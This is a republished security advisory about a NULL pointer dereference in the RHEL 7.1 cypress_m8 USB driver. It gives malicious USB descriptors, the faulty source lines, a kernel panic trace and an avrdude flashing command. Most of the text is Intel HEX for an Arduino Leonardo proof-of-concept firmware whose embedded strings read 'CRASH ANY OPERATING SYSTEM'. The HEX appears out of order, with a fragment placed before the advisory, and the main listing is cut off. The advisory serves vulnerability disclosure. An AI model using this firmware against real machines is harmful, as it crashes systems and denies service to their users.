:1014F400010102030109040000030100000003F2DA
:101504000AEC0A0902270001010000FA01AB0A09EA
:101514000400000301000000090200202020202014
:101524005F5F5F5F5F5F5F5F2020202020202020BF
:1015340020202020202020202020202020202020A7
:1015440020205F5F5F5F5F205F5F20205F2020209F
:101554002020205F5F0A0D00202020202F205F5FC5
:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3
:101574005F5F20205F5F5F5F5F20202020202F209F
:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3
:10159400202F5F5F0A0D002020202F202F202020E5
:1015A4002F205F5F205C2F205F5F20602F205F5F14
:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A
:1015C400205C2F205F5F2F202F205F5F5F2F202F55
:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009
:1015E4002F202F202F202F5F2F202F202F5F2F2001
:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0
:101604002F202F5F2F202F202F5F5F2F202C3C0AAD
:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07
:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F
:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4
:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044
:101654003C3C2043485241534820414E59204F506E
:1016640045524154494E472053595354454D203E09
:101674003E0A0D00203C3C202863292053657267F4
:10168400656A20536368756D696C6F20323031353B
:101694002C204F70656E536F7572636520536563BC
:1016A40075726974792052616C66205370656E6E30
:1016B4006562657267203E3E0A0D000A3E3E205078
:1016C4007265737320627574746F6E20746F207307
:1016D4007461727420657865637574696F6E2E2EFB
:1016E4002E0A0D005B44454255475D2045786563ED
:1016F400757465207061796C6F616420300A0D0027
:10170400526563762D446174613A0A0D005B444569
:101714004255475D200953656E6420436F6E6669C8
:101724006775726174696F6E44657363726970740E
:101734006F720928696E6465783A2569292E2E2E00
:101744000D0A005B44454255475D200953656E64AC
:1017540020496E74657266616365204465736372C3
:101764006970746F720928696E7465726661636565
:101774003A2569292E2E2E0D0A005B444542554711
:101784005D200953656E6420456E64706F696E74E4
:101794002044657363726970746F720928656E649E
:1017A400706F696E743A2569292E2E2E0D0A005B1E
:1017B40044454255475D203C3C70616E6963206D31
:1017C4006F64653F3E3E0D0A005B44454255475DEC
:1017D4002009203E3E20537472696E67204465736D
:1017E40063726970746F72207265717565737420A9
:1017F4002D2073656E64696E67206D616C666F720F
:101804006D656420737472696E67212073657475E5
:10181400702E7756616C75654C203D3D2025690D11
:101824000A005B48455844554D505D0A0D0025306B
:041834003258200006
:00000001FF
--
HireHackking 
OS-S Security Advisory 2016-07
Linux cypress_m8 Nullpointer Dereference

Date: March 4th, 2016
Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg
CVE: not yet assigned
CVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes on invalid 
USB device descriptors (cypress_m8 driver)
Severity: Critical. The Kernel panics. A reboot is required.
Ease of Exploitation: Trivial
Vulnerability type: Wrong input validation
Products: RHEL 7.1 including all updates
Kernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the 
CentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7)
Vendor: Red Hat
Vendor contacted: November, 12th 2015
PDF of Advisory: https://os-s.net/advisories/OSS-2016-07_cypress_m8.pdf

Abstract:
The Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB 
device which requires the requiring the cypress_m8 driver.

Detailed product description:
We confirmed the bug on the following system:
RHEL 7.1
Kernel 3.10.0-229.20.1.el7.x86_64
Further products or kernel versions have not been tested.
How reproducible: Always
Actual results: Kernel crashes.

Description:
The bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo 
(github.com/schumilo) using the following device descriptor:

[*] Device-Descriptor
bLength:	0x12
bDescriptorType:	0x1
bcdUSB:	0x200
bDeviceClass:	0x3
bDeviceSubClass:	0x0
bDeviceProtocol:	0x0
bMaxPacketSize:	0x40
idVendor:	0x4b4
idProduct:	0x5500
bcdDevice:	0x100
iManufacturer:	0x1
iProduct:	0x2
iSerialNumbers:	0x3
bNumConfigurations:	0x1

This is the configuration descriptor containing only one interrupt-endpoint-
descriptor (IN-direction).
The cypress_m8 driver assumes that there will be at least two endpoint-
descriptors configured for interrupt-transfer and each used for one direction. 
Since there is no sanity check, it is possible that the kernel tries to 
dereference a null-pointer.
This results in a crash of the system.

****
$ nm cypress_m8.ko.debug | grep cypress_generic_port_probe
00000000000008d0 t cypress_generic_port_probe
$ addr2line -e cypress_m8.ko.debug 0x9D0
/usr/src/debug/kernel-3.10.0-229.14.1.el7/linux-3.10.0-229.14.1.el7.x86_
64/drivers/usb/serial/cypress_m8.c:488
****

**** CentOS-Kernel linux-3.10.0-229.14.1.el7 (drivers/usb/serial/cypress_m8.c)
...
482 if (interval > 0) {
483 priv->write_urb_interval = interval;
484 priv->read_urb_interval = interval;
485 dev_dbg(&port->dev, "%s - read & write intervals forced to %d\n",
486 __func__, interval);
487 } else {
488 priv->write_urb_interval = port->interrupt_out_urb->interval; /* 
possible null-pointer dereference */
489 priv->read_urb_interval = port->interrupt_in_urb->interval; /* 
possible null-pointer dereference */
490 dev_dbg(&port->dev, "%s - intervals: read=%d write=%d\n",
491 __func__, priv->read_urb_interval,
492 priv->write_urb_interval);
493 }
... 
****

[*] Configuration-Descriptor
bLength:	0x9
bDescriptorType:	0x2
wTotalLength:	0x27
bNumInterfaces:	0x1
bConfigurationValue:	0x1
iConfiguration:	0x0
bmAttributes:	0x0
bMaxPower:	0x31
[*] Interface-Descriptor
bLength:	0x9
bDescriptorType:	0x4
bInterfaceNumber:	0x0
bAlternateSetting:	0x0
bNumEndpoints:	0x3
bInterfaceClass:	0x0
bInterfaceSubClass:	0x0
bInterfaceProtocol:	0x0
[*] Endpoint-Descriptor:
bLength:	0x7
bDescriptorType:	0x5
bEndpointAddress:	0x81	ï?? IN-Direction
bmAttribut:	0x3	ï?? Interrupt-Transfer
wMaxPacketSize:	0x404
bInterval:	0xc
[*] Endpoint-Descriptor:
bLength:	0x7
bDescriptorType:	0x5
bEndpointAddress:	0x1	ï??OUT-Direction
bmAttribut:	0x2	ï??Bulk-Transfer
wMaxPacketSize:	0x4
bInterval:	0xc
[*] Endpoint-Descriptor:
bLength:	0x7
bDescriptorType:	0x5
bEndpointAddress:	0x82	ï??IN-Direction
bmAttribut:	0x1	ï??Bulk-Transfer
wMaxPacketSize:	0x4
bInterval:	0xc

Proof of Concept:
For a proof of concept, we are providing an Arduino Leonardo firmware file. This 
firmware will emulate the defective USB device.

avrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U 
flash:w:binary.hex

The firmware has been attached to this bug report.
To prevent the automated delivery of the payload, a jumper may be used to 
connect port D3 and 3V3!

Severity and Ease of Exploitation:
The vulnerability can be easily exploited. Using our Arduino Leonardo firmware, 
only physical access to the system is required.

Vendor Communication:
We contacted Red Hat on the November, 12th 2015.
To this day, no security patch was provided by the vendor.
Since our 90-day Responsible Discourse deadline is expired, we publish this 
Security Advisory.

References:
https://bugzilla.redhat.com/show_bug.cgi?id=1283368

Kernel Stacktrace:

[ 40.138619] usb 1-1: new full-speed USB device number 2 using xhci_hcd
[ 40.366581] usb 1-1: New USB device found, idVendor=04b4, idProduct=5500
[ 40.373039] usb 1-1: New USB device strings: Mfr=1, Product=2, 
SerialNumber=3
[ 40.381857] usb 1-1: Product: Ä?
[ 40.385232] usb 1-1: Manufacturer: Ä?
[ 40.389227] usb 1-1: SerialNumber: %
[ 40.397815] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc 
says 96 microframes
[ 40.457689] usbcore: registered new interface driver cypress_m8
[ 40.469365] usbserial: USB Serial support registered for DeLorme Earthmate 
USB
[ 40.480135] usbserial: USB Serial support registered for HID->COM RS232 
Adapter
[ 40.494974] usbserial: USB Serial support registered for Nokia CA-42 V2 
Adapter
[ 40.502183] cypress_m8 1-1:1.0: HID->COM RS232 Adapter converter detected
[ 40.512683] BUG: unable to handle kernel NULL pointer dereference at 
00000000000000a8
[ 40.513393] IP: [<ffffffffa03939d0>] cypress_generic_port_probe+0x100/0x1a0 
[cypress_m8]
[ 40.513393] PGD 0 
[ 40.513393] Oops: 0000 [#1] SMP 
[ 40.513393] Modules linked in: cypress_m8(+) ip6t_rpfilter ip6t_REJECT 
ipt_REJECT xt_conntrack ebtable_nat ebtable_broute bridge stp llc 
ebtable_filter ebtables ip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 
nf_nat_ipv6 ip6table_mangle ip6table_security ip6table_raw ip6table_filter 
ip6_tables iptable_nat nf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat 
nf_conntrack iptable_mangle iptable_security iptable_raw iptable_filter 
ip_tables bochs_drm ppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper 
drm pcspkr i2c_piix4 i2c_core serio_raw parport_pc parport xfs libcrc32c 
sd_mod sr_mod crc_t10dif cdrom crct10dif_common ata_generic pata_acpi ata_piix 
libata e1000 floppy dm_mirror dm_region_hash dm_log dm_mod
[ 40.513393] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted 
3.10.0-229.14.1.el7.x86_64 #1
[ 40.513393] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 
rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 40.513393] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000
[ 40.513393] RIP: 0010:[<ffffffffa03939d0>] [<ffffffffa03939d0>] 
cypress_generic_port_probe+0x100/0x1a0 [cypress_m8]
[ 40.513393] RSP: 0018:ffff88000bd238d0 EFLAGS: 00010246
[ 40.513393] RAX: 0000000000000000 RBX: ffff88000c5149c0 RCX: ffff88000bd23fd8
[ 40.513393] RDX: 0000000000000000 RSI: ffffffff81447840 RDI: ffff88000aeff040
[ 40.513393] RBP: ffff88000bd238f0 R08: 0000000000000000 R09: ffff88000fc16380
[ 40.513393] R10: ffffea000030eb00 R11: ffffffff8141968b R12: ffff88000bcd3800
[ 40.513393] R13: 0000000000000000 R14: ffff88000bcd3ab0 R15: ffffffffa0396200
[ 40.513393] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) 
knlGS:0000000000000000
[ 40.513393] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 40.513393] CR2: 00000000000000a8 CR3: 000000000c572000 CR4: 
00000000000006f0
[ 40.513393] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 
0000000000000000
[ 40.513393] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
[ 40.513393] Stack:
[ 40.513393] ffff88000bcd3ab0 ffff88000bcd3800 ffff88000bcd3800 ffffffffa0396200
[ 40.513393] ffff88000bd23910 ffffffffa0393b04 ffff88000bcd3ab0 0000000000000000
[ 40.513393] ffff88000bd23940 ffffffff81461cf6 ffff88000bcd3ab0 ffff88000bcd3ab0
[ 40.513393] Call Trace:
[ 40.513393] [<ffffffffa0393b04>] cypress_hidcom_port_probe+0x14/0x80 
[cypress_m8]
[ 40.513393] [<ffffffff81461cf6>] usb_serial_device_probe+0x56/0x110
[ 40.513393] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[ 40.513393] [<ffffffff813d33e0>] ? driver_probe_device+0x390/0x390
[ 40.513393] [<ffffffff813d341b>] __device_attach+0x3b/0x40
[ 40.513393] [<ffffffff813d0f1b>] bus_for_each_drv+0x6b/0xb0
[ 40.513393] [<ffffffff813d2fd8>] device_attach+0x88/0xa0
[ 40.513393] [<ffffffff813d22d8>] bus_probe_device+0x98/0xc0
[ 40.513393] [<ffffffff813cfd64>] device_add+0x4c4/0x7a0
[ 40.513393] [<ffffffff81460243>] usb_serial_probe+0x1123/0x1230
[ 40.513393] [<ffffffff812d649c>] ? ida_get_new_above+0x7c/0x2a0
[ 40.513393] [<ffffffff811aba6a>] ? kmem_cache_alloc+0x1ba/0x1d0
[ 40.513393] [<ffffffff8123e5b2>] ? sysfs_addrm_finish+0x42/0xe0
[ 40.513393] [<ffffffff8123e391>] ? __sysfs_add_one+0x61/0x100
[ 40.513393] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0
[ 40.513393] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390
[ 40.513393] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0
[ 40.513393] [<ffffffff813d3420>] ? __device_attach+0x40/0x40
[ 40.513393] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0
[ 40.513393] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20
[ 40.513393] [<ffffffff8145ec4b>] usb_serial_register_drivers+0x29b/0x580
[ 40.513393] [<ffffffffa0399000>] ? 0xffffffffa0398fff
[ 40.513393] [<ffffffffa039901e>] usb_serial_module_init+0x1e/0x1000 
[cypress_m8]
[ 40.513393] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230
[ 40.513393] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40
[ 40.513393] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0
[ 40.513393] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150
[ 40.513393] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0
[ 40.513393] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b
[ 40.513393] Code: 03 e1 41 c7 84 24 38 01 00 00 00 01 00 00 5b 41 5c 44 89 
e8 41 5d 41 5e 5d c3 90 49 8b 84 24 78 01 00 00 4d 8d b4 24 b0 02 00 00 <44> 
8b 88 a8 00 00 00 44 89 4b 34 49 8b 84 24 58 01 00 00 44 8b 
[ 40.513393] RIP [<ffffffffa03939d0>] cypress_generic_port_probe+0x100/0x1a0 
[cypress_m8]
[ 40.513393] RSP <ffff88000bd238d0>
[ 40.513393] CR2: 00000000000000a8
[ 41.005529] ---[ end trace b239663354a1c556 ]---
[ 41.010284] Kernel panic - not syncing: Fatal exception
[ 41.011253] drm_kms_helper: panic occurred, switching back to text console

Arduino Leonardo Firmware:

:100000000C94A8000C94C5000C94C5000C94C50079
:100010000C94C5000C94C5000C94C5000C94C5004C
:100020000C94C5000C94C5000C94C4050C942F04CA
:100030000C94C5000C94C5000C94C5000C94C5002C
:100040000C94C5000C94C5000C94C5000C94C5001C
:100050000C94C5000C94C5000C94C5000C940E02C1
:100060000C94C5000C94C5000C94C5000C94C500FC
:100070000C94C5000C94C5000C94C5000C94C500EC
:100080000C94C5000C94C5000C94C5000C94C500DC
:100090000C94C5000C94C5000C94C5000C94C500CC
:1000A0000C94C5000C94C5000C94C5000B030E0302
:1000B000010305032F032F032F03120316031A0353
:1000C000200324032F032A030000000200080E006F
:1000D00000030401000B000000000000000000000D
:1000E00000000000000004080201104080401020C1
:1000F00040804080080204018040201002011080EE
:100100001020404004040404040304050202020217
:1001100004030202020206060606060604040202A0
:100120000204000000002300260029002C002F00FC
:1001300000000000250028002B002E0031000000E8
:100140000000240027002A002D00300000C180811B
:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077
:10016000B1E0E4EDF3E102C005900D92A436B107D1
:10017000D9F725E0A4E6B5E001C01D92AF37B2077C
:10018000E1F70E94C8000C9404070C940000089545
:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421
:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B
:1001B00083E00E94300361E087E00E94300361E049
:1001C00088E00E9430030E9459067E012AE9E20E6F
:1001D000F11C84E093E0D70111969C938E9389E003
:1001E00094E013969C938E93129782E2E2E1F1E001
:1001F0009E012F5F3F4F6901D90101900D928A95B1
:10020000E1F788E1E4E3F1E0DE01939601900D92DD
:100210008A95E1F782E1ECE4F1E0DE01DB96019002
:100220000D928A95E1F789E0EEE5F1E0DE01A05953
:10023000BF4F01900D928A95E1F72A593F4F99E0FF
:10024000992ED901E92D1D92EA95E9F78E010957FA
:100250001F4F87E0E7E6F1E0D80101900D928A9503
:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189
:1002700001900D928A95E1F7AE0147585F4F87E0F4
:10028000E5E7F1E0DA0101900D928A95E1F75E0170
:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D
:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172
:1002B0001D92EA95E9F7E3E0DC011996EC93D90188
:1002C0009C92F4E01196FC9311971496EC93F9012B
:1002D000DC01292D01900D922A95E1F7FE01EC56E3
:1002E000FF4FDC011B96FC93EE931A971D96BC9270
:1002F000AE921C971183008373836283558344837A
:100300000C5211092CE0F80111922A95E9F721E02D
:10031000D80119962C931997FE01E059FF4F0190CF
:100320000D929A94E1F7F8019387828761E088E063
:100330000E9469038BE492E00E94650688E892E0DF
:100340000E94650687EC92E00E94650686E093E0D5
:100350000E94650682E493E00E9465068FE793E0C1
:100360000E94650684EA93E00E9465068BEE93E0A6
:100370000E94650683E00E949F03892B09F047C015
:100380005E01F3E2AF0EB11C8824839482E1982EC3
:1003900084E194E00E946506BF92AF92DF92CF9213
:1003A000FF92EF921F928F921F930F932DB73EB73C
:1003B000225131090FB6F8943EBF0FBE2DBFADB725
:1003C000BEB71196FE01FB96892D01900D928A957C
:1003D000E1F78DE695E00E94030668E873E180E0AE
:1003E00090E00E947B028DE695E00E944E0660E060
:1003F00087E00E94690368E873E180E090E00E9472
:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E
:1004100070E080E090E00E947B02ACCF1F920F92D0
:100420000FB60F9211242F933F938F939F93AF9307
:10043000BF938091650590916605A0916705B09185
:1004400068053091640523E0230F2D3720F40196D1
:10045000A11DB11D05C026E8230F0296A11DB11DE7
:10046000209364058093650590936605A0936705C6
:10047000B09368058091690590916A05A0916B051C
:10048000B0916C050196A11DB11D809369059093F3
:100490006A05A0936B05B0936C05BF91AF919F91D6
:1004A0008F913F912F910F900FBE0F901F90189535
:1004B0003FB7F8948091690590916A05A0916B050A
:1004C000B0916C0526B5A89B05C02F3F19F0019689
:1004D000A11DB11D3FBF6627782F892F9A2F620F6C
:1004E000711D811D911D42E0660F771F881F991FA6
:1004F0004A95D1F70895CF92DF92EF92FF92CF9372
:10050000DF936B017C010E945802EB01C114D104FE
:10051000E104F10479F00E9458026C1B7D0B683EE7
:100520007340A0F381E0C81AD108E108F108C8516E
:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029
:100540000895789484B5826084BD84B5816084BD4B
:1005500085B5826085BD85B5816085BDEEE6F0E03C
:10056000808181608083E1E8F0E010828081826098
:100570008083808181608083E0E8F0E08081816019
:100580008083E1E9F0E08081826080838081816006
:100590008083E0E9F0E0808181608083E1ECF0E03D
:1005A000808184608083808182608083808181609B
:1005B0008083E3ECF0E0808181608083E0ECF0E018
:1005C000808182608083E2ECF0E0808181608083C2
:1005D000EAE7F0E0808184608083808182608083AC
:1005E000808181608083808180688083089590E02D
:1005F000FC013197EE30F10590F5EA5AFF4F0C946B
:10060000AB09809180008F7703C0809180008F7D3F
:1006100080938000089584B58F7702C084B58F7D64
:1006200084BD0895809190008F7707C080919000DD
:100630008F7D03C080919000877F80939000089504
:100640008091C0008F7703C08091C0008F7D809320
:10065000C00008958091C200877F8093C2000895F2
:10066000CF93DF9390E0FC01EA51FF4F2491FC010E
:10067000EC5FFE4F8491882349F190E0880F991F29
:10068000FC01E25CFE4FA591B491805D9E4FFC01A0
:10069000C591D4919FB7611108C0F8948C912095B1
:1006A00082238C93888182230AC0623051F4F894AB
:1006B0008C91322F309583238C938881822B888371
:1006C00004C0F8948C91822B8C939FBFDF91CF91C3
:1006D00008950F931F93CF93DF931F92CDB7DEB78B
:1006E000282F30E0F901E853FF4F8491F901EA51D6
:1006F000FF4F1491F901EC5FFE4F04910023C9F004
:10070000882321F069830E94F7026981E02FF0E0DD
:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7
:100720008C91611103C01095812301C0812B8C93A2
:100730009FBF0F90DF91CF911F910F910895CF939D
:10074000DF93282F30E0F901E853FF4F8491F9013E
:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5
:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5
:10077000EE5DFE4FA591B4912C912D2381E090E088
:1007800021F480E002C080E090E0DF91CF910895F5
:10079000615030F02091F100FC0120830196F8CFE8
:1007A000289884E680937D0508951092E9001092C0
:1007B00071051092700590936F0580936E050895F2
:1007C000FF920F931F93CF93DF93F82E8B01EA01D3
:1007D000BA01C8010E94A606F80120E030E08EEFC1
:1007E0002C173D0791F1F7FE02C0A49101C0A08132
:1007F000609170057091710540916E0550916F0583
:1008000064177507ACF49091E8009570E1F390914E
:10081000E80092FD1CC0A093F100A0917005B0917A
:1008200071051196AF73BB27AB2B11F48093E800D1
:10083000A0917005B09171051196B0937105A093C8
:1008400070052F5F3F4F3196CBCFC90102C08FEFAC
:100850009FEFDF91CF911F910F91FF9008951F920D
:100860000F920FB60F9211246F927F928F929F92E8
:10087000AF92BF92CF92DF92EF92FF920F931F93AE
:100880002F933F934F935F936F937F938F939F9398
:10089000AF93BF93EF93FF93CF93DF93CDB7DEB7C3
:1008A0006297DEBFCDBF1092E9008091E80083FF20
:1008B00046C168E0CE010A960E94C80382EF809389
:1008C000E8009A8597FF05C08091E80080FFFCCF83
:1008D00003C08EEF8093E800892F807609F023C152
:1008E0008B85811105C01092F1001092F10020C19A
:1008F000282F2D7F213009F41BC1853049F48091C8
:10090000E80080FFFCCF8C8580688093E30010C1F5
:10091000863009F0E1C02D8508891989223009F057
:10092000B3C0EC848E2D90E0209173053091740556
:10093000821793070CF09FC00E94D5031F92EF927D
:100940008DE394E09F938F930E9483068CE0E89E52
:1009500070011124E0917505F0917605EE0DFF1DF3
:1009600089E0DE01119601900D928A95E1F7C801A8
:100970000E94D50349E050E0BE016F5F7F4F80E0E9
:100980000E94E0030F900F900F900F90C12CD12C7C
:10099000612C712C33E7A32E34E0B32E4AEA842E67
:1009A00044E0942EE0917505F0917605EE0DFF1D63
:1009B000818590E0681679060CF0BAC07F926F923C
:1009C000BF92AF920E948306E0917505F091760583
:1009D000EE0DFF1D628573856C0D7D1D49E050E0B5
:1009E00080E00E94E0030F900F900F900F9000E0C6
:1009F00010E0E0917505F0917605EE0DFF1D028483
:100A0000F385E02DEC0DFD1D818590E00817190799
:100A10005CF51F930F939F928F920E948306E09143
:100A20007505F0917605EE0DFF1D0284F385E02D2E
:100A3000EC0DFD1DC801880F991FA485B585A80F71
:100A4000B91F4D915C910284F385E02DE80FF91FE9
:100A50006081718180E00E94E0030F5F1F4F0F9063
:100A60000F900F900F90C5CF8FEF681A780A8EE025
:100A7000C80ED11C97CF8FED94E09F938F930E9467
:100A800083060F900F9058C0C8012A8B0E94D5038F
:100A90002A892130C1F0233009F04EC08C851F9285
:100AA0008F9389EF94E09F938F930E94830642E097
:100AB00050E062E871E080E00E94E0030F900F9048
:100AC0000F900F9035C04091000150E060E071E060
:100AD00080E00E94E0032CC0873071F1883021F45F
:100AE00081E08093F10024C0893011F5937021F5E5
:100AF000EDE4F1E081E021E096E38093E9002093CA
:100B0000EB0034913093EC009093ED008F5F3196C1
:100B1000843099F78EE78093EA001092EA008C8582
:100B20008093720505C0888999890E94D50304C005
:100B30008EEF8093E80003C081E28093EB00629621
:100B40000FB6F894DEBF0FBECDBFDF91CF91FF91FE
:100B5000EF91BF91AF919F918F917F916F915F9135
:100B60004F913F912F911F910F91FF90EF90DF9048
:100B7000CF90BF90AF909F908F907F906F900F908D
:100B80000FBE0F901F9018951F920F920FB60F92E5
:100B900011248F939F938091E1001092E10083FFD5
:100BA0000FC01092E90091E09093EB001092EC00DE
:100BB00092E39093ED001092720598E09093F0000C
:100BC00082FF1AC080917E05882339F080917E05CE
:100BD000815080937E05882369F080917D0588236C
:100BE00059F080917D05815080937D05811104C06D
:100BF000289A02C05D9AF1CF9F918F910F900FBEFE
:100C00000F901F901895CF93DF93CDB7DEB782E199
:100C1000FE013596A0E0B1E001900D928A95E1F7D2
:100C20008F89988D9093760580937505898D9A8D1F
:100C300090937405809373058B8D9C8D90937C05A8
:100C400080937B058D8D9E8D90937A058093790599
:100C50008F8D98A1909378058093770510927205F7
:100C600081E08093D70080EA8093D80082E189BD3B
:100C700009B400FEFDCF61E070E080E090E00E94EA
:100C80007B0280E98093D8008CE08093E200109290
:100C9000E000559A209ADF91CF91089581E08093EA
:100CA000E00008959091C80095FFFCCF8093CE009E
:100CB00008951092CD0087E68093CC0088E1809360
:100CC000C9008EE08093CA0008950F931F93CF93BD
:100CD000DF93EC018C01FE0101900020E9F73197D0
:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E
:100CF000F80181918F010E945206EDCFDF91CF91D3
:100D00001F910F910895CF93DF93CDB7DEB7DA959A
:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6
:100D2000419151919F0160E071E0CE0101960E94D6
:100D30000707CE0101960E946506D3950FB6F89479
:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE
:100D5000AF92BF92CF92DF92EF92FF920F931F93C9
:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E
:100D70003F932F9389839A830E9483068981882ECB
:100D80009A81992E0F900F9000E010E08EE5E82EEA
:100D900085E0F82E91E1C92E94E0D92E0A151B05A5
:100DA000E4F4F40181914F0190E09F938F93FF92BF
:100DB000EF920E9483060F5F1F4FC8018F70992723
:100DC0000F900F900F900F90892B41F7DF92CF92E9
:100DD0000E9483060F900F90E1CF81E194E09F93F2
:100DE0008F930E9483060F900F900F900F90DF91CA
:100DF000CF911F910F91FF90EF90DF90CF90BF9018
:100E0000AF909F908F900895F8940C94E809AEE00D
:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8
:100E20004C831A83098377FF02C060E070E8615049
:100E300071097E836D83A901BC01CE0101960E94D8
:100E400033074D815E8157FD0AC02F8138854217D7
:100E500053070CF49A01F801E20FF31F10822E964B
:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB
:100E7000B1097C016B018A01FC0117821682838112
:100E800081FFBDC1CE0101964C01F7019381F601AE
:100E900093FD859193FF81916F01882309F4ABC184
:100EA000853239F493FD859193FF81916F018532ED
:100EB00029F4B70190E00E941B09E7CF512C312C97
:100EC00020E02032A0F48B3269F030F4803259F007
:100ED000833269F420612CC08D3239F0803339F4CB
:100EE000216026C02260246023C0286021C027FD25
:100EF00027C030ED380F3A3078F426FF06C0FAE00C
:100F00005F9E300D1124532E13C08AE0389E300DA1
:100F10001124332E20620CC08E3221F426FD6BC1C9
:100F2000206406C08C3611F4206802C0883641F473
:100F3000F60193FD859193FF81916F018111C1CFDE
:100F4000982F9F7D9554933028F40C5F1F4FFFE33B
:100F5000F9830DC0833631F0833771F0833509F0A2
:100F60005BC022C0F801808189830E5F1F4F44243B
:100F70004394512C540115C03801F2E06F0E711CDE
:100F8000F801A080B18026FF03C0652D70E002C08B
:100F90006FEF7FEFC5012C870E9410092C018301A0
:100FA0002C852F77222E17C03801F2E06F0E711CAE
:100FB000F801A080B18026FF03C0652D70E002C05B
:100FC0006FEF7FEFC5012C870E9405092C012C854E
:100FD0002068222E830123FC1BC0832D90E048163D
:100FE0005906B0F4B70180E290E00E941B093A94E0
:100FF000F4CFF50127FC859127FE81915F01B701B0
:1010000090E00E941B0931103A94F1E04F1A510808
:101010004114510471F7E5C0843611F0893639F571
:10102000F80127FF07C060817181828193810C5F85
:101030001F4F08C060817181882777FD8095982FA8
:101040000E5F1F4F2F76B22E97FF09C090958095A7
:10105000709561957F4F8F4F9F4F2068B22E2AE089
:1010600030E0A4010E944D09A82EA81844C085377D
:1010700029F42F7EB22E2AE030E025C0F22FF97F2E
:10108000BF2E8F36C1F018F4883579F0B4C08037A0
:1010900019F0883721F0AFC02F2F2061B22EB4FE97
:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D
:1010B0009660B92E06C028E030E005C020E130E09F
:1010C00002C020E132E0F801B7FE07C06081718103
:1010D000828193810C5F1F4F06C06081718180E027
:1010E00090E00E5F1F4FA4010E944D09A82EA81882
:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428
:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0
:101110007A2C2B2D03C07A2C01C0752C24FF0DC016
:10112000FE01EA0DF11D8081803311F4297E09C092
:1011300022FF06C07394739404C0822F867809F04E
:10114000739423FD13C020FF06C05A2C731418F4A7
:10115000530C5718732C731468F4B70180E290E0B5
:101160002C870E941B0973942C85F5CF731410F4FF
:10117000371801C0312C24FF12C0B70180E390E082
:101180002C870E941B092C8522FF17C021FF03C05A
:1011900088E590E002C088E790E0B7010CC0822F9C
:1011A000867859F021FD02C080E201C08BE227FD64
:1011B0008DE2B70190E00E941B09A51438F4B70135
:1011C00080E390E00E941B095A94F7CFAA94F4019F
:1011D000EA0DF11D8081B70190E00E941B09A1106A
:1011E000F5CF332009F451CEB70180E290E00E94A0
:1011F0001B093A94F6CFF7018681978102C08FEFE1
:101200009FEF2C96E2E10C94CD09FC010590615012
:1012100070400110D8F7809590958E0F9F1F08950C
:10122000FC016150704001900110D8F780959095B5
:101230008E0F9F1F08950F931F93CF93DF93182F47
:10124000092FEB018B8181FD03C08FEF9FEF20C041
:1012500082FF10C04E815F812C813D814217530770
:101260007CF4E881F9819F012F5F3F4F3983288308
:10127000108306C0E885F985812F0995892B29F708
:101280002E813F812F5F3F4F3F832E83812F902FF1
:10129000DF91CF911F910F910895FA01AA2728306D
:1012A00051F1203181F1E8946F936E7F6E5F7F4F33
:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF
